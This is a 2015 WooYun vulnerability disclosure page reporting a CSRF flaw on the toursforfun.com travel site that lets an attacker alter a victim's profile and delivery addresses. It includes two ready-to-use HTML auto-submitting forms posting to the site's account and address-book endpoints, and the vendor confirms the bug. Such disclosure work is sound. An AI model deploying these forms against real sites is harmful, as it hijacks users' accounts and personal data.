当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139183

漏洞标题:途风旅游网CSRF可劫持用户资料(手机号、家庭住址等)和收货地址

相关厂商:toursforfun.com

漏洞作者: RRRS7in0

提交时间:2015-09-06 10:45

修复时间:2015-10-21 13:42

公开时间:2015-10-21 13:42

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经确认,细节仅向厂商公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

如题

详细说明:

一、基本资料
1、地址

https://cn.toursforfun.com/account_edit.php#my-information


2、修改资料时抓包,生成POC

1.jpg


POC:

<html>
  <body>
    <form action="https://cn.toursforfun.com/account_edit.php" method="POST">
      <input type="hidden" name="sur&#95;name" value="test123" />
      <input type="hidden" name="given&#95;name" value="Given&#32;name" />
      <input type="hidden" name="chinese&#95;name" value="test123" />
      <input type="hidden" name="email" value="test0123&#64;qq&#46;com" />
      <input type="hidden" name="country&#95;code" value="" />
      <input type="hidden" name="cell" value="" />
      <input type="hidden" name="country&#95;id" value="243" />
      <input type="hidden" name="zone&#95;id" value="322" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="street&#95;address" value="" />
      <input type="hidden" name="zip" value="" />
      <input type="hidden" name="sex" value="m" />
      <input type="hidden" name="dob" value="0000&#45;00&#45;00" />
      <input type="hidden" name="birthday&#95;secret&#95;type" value="0" />
      <input type="hidden" name="other&#95;phone" value="" />
      <input type="hidden" name="submit" value="ä&#191;&#157;å&#173;&#152;ä&#191;&#161;æ&#129;&#175;" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


3、点击POC之前

2.jpg


4、点击POC之后

3.jpg


二、收货地址劫持:直接写上POC了
1、地址:

http://cn.toursforfun.com/address_book.php?action=add


POC

<html>
  <body>
    <form action="http://cn.toursforfun.com/address_book.php?action=add" method="POST">
      <input type="hidden" name="description" value="test" />
      <input type="hidden" name="type" value="0" />
      <input type="hidden" name="first&#95;name" value="test" />
      <input type="hidden" name="last&#95;name" value="test" />
      <input type="hidden" name="chinese&#95;name" value="test" />
      <input type="hidden" name="email&#95;address" value="test1234&#64;qq&#46;com" />
      <input type="hidden" name="cellphone" value="132873876" />
      <input type="hidden" name="country&#95;id" value="223" />
      <input type="hidden" name="zone&#95;id" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="state" value="New&#32;York" />
      <input type="hidden" name="street&#95;address" value="test" />
      <input type="hidden" name="zip" value="010000" />
      <input type="hidden" name="other&#95;phone" value="" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="submit" value="ä&#191;&#157;å&#173;&#152;" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


2、我验证过是可以了,但是懒得截图了

漏洞证明:

修复方案:

版权声明:转载请注明来源 RRRS7in0@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-09-06 13:41

厂商回复:

经确认漏洞存在
下次提交请先将csrf poc的value值html解码,谢谢

最新状态:

暂无